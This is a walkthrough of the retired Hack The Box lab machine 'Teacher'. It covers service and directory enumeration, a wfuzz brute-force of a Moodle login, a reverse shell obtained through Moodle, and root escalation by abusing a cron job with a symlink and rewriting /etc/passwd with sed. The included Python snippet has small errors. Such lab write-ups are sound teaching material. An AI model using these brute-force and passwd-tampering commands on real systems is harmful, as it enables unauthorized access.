This post documents the complete walkthrough of Teacher, a retired vulnerable VM created by Gioo, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Teacher is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 10.10.10.153 ... PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Blackhat highschool

nmap finds 80/tcp open. Let’s go with that.

Directory/File Enumeration

Based on my experience, it’s always good to run some kind of fuzzing when faced with a lack of hints. Let’s run wfuzz and SecList’s common.txt , and see what we can find.

# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 --hc 404 http://10.10.10.153/FUZZ ******************************************************** * Wfuzz 2.3.1 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.153/FUZZ Total requests: 4593 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000010: C=403 11 L 32 W 291 Ch ".hta" 000011: C=403 11 L 32 W 296 Ch ".htaccess" 000012: C=403 11 L 32 W 296 Ch ".htpasswd" 001232: C=301 9 L 28 W 310 Ch "css" 001735: C=301 9 L 28 W 312 Ch "fonts" 002067: C=301 9 L 28 W 313 Ch "images" 002094: C=200 249 L 747 W 8028 Ch "index.html" 002218: C=301 9 L 28 W 317 Ch "javascript" 002250: C=301 9 L 28 W 309 Ch "js" 002497: C=301 9 L 28 W 313 Ch "manual" 002627: C=301 9 L 28 W 313 Ch "moodle" 002995: C=403 11 L 32 W 297 Ch "phpmyadmin" 003597: C=403 11 L 32 W 300 Ch "server-status" Total time: 47.61103 Processed Requests: 4593 Filtered Requests: 4580 Requests/sec.: 96.46924

The site is running Moodle. Moodle is the world’s open source learning platform. Moodle has its fair share of SQLi and RCE vulnerabilities but would require authenticated access.

While I was hunting around for a credential, something caught my eye at the Teacher’s gallery page.

I got double F’s! Something funky is going on here…

5.png is not an image. It’s a text file.

Gotcha!

It’s easy to generate a password list for brute-forcing the Moodle login form. You can do it with Python like so.

import string charset = string . ascii_letters + string . digits + string . punctuations f = open ( 'passwords.txt' , 'w' ) s = Th4C00lTheacha t = '' for c in charset : t += s + c + '

' f . write ( t ) f . close ()

Once the password list is generated, we can use wfuzz to brute-force it.

# wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php ******************************************************** * Wfuzz 2.3.1 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.153/moodle/login/index.php Total requests: 94 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000065: C=303 6 L 34 W 454 Ch "Th4C00lTheacha#" Total time: 17.72110 Processed Requests: 94 Filtered Requests: 93 Requests/sec.: 5.304409

The credential is ( giovanni:Th4C00lTheacha# ).

Low-Privilege Shell

Following the instructions from this post, I was able to execute a reverse shell back to me.

First, create a calculated question like so.

Create the formula like so.

Then execute remote commands on the host to run a reverse shell back to me using nc .

There you have it, a low-privilege shell.

Let’s upgrade our shell with a pseudo-TTY using Python and then stty raw -echo; fg; reset .

Privilege Escalation

I’m aware that Moodle connects to a database backend to store all the good stuff. The database settings are in config.php at the Moodle directory.

Let’s connect to the database.

Cracking the MD5 hash is easy.

This is the password to giovanni ’s account. user.txt is in the home directory.

During enumeration of giovanni ’s account, I noticed the pressence of work directory and /usr/bin/backup.sh referred to it.

If I had to guess, I would say this is inside a cron job ran with root privileges since giovanni has no permissions to edit it.

But, look at the last line. It changes the permissions of any file to rwxrwxrwx . What if I put a symbolic link to /etc/passwd in it?

Boom! Anyone can edit /etc/passwd . Let’s give ourselves root access.

$ sed -r '1h;x;2s/root:x/toor:to5bce5sr7eK6/' /etc/passwd > /tmp/passwd $ cp /tmp/passwd /etc/passwd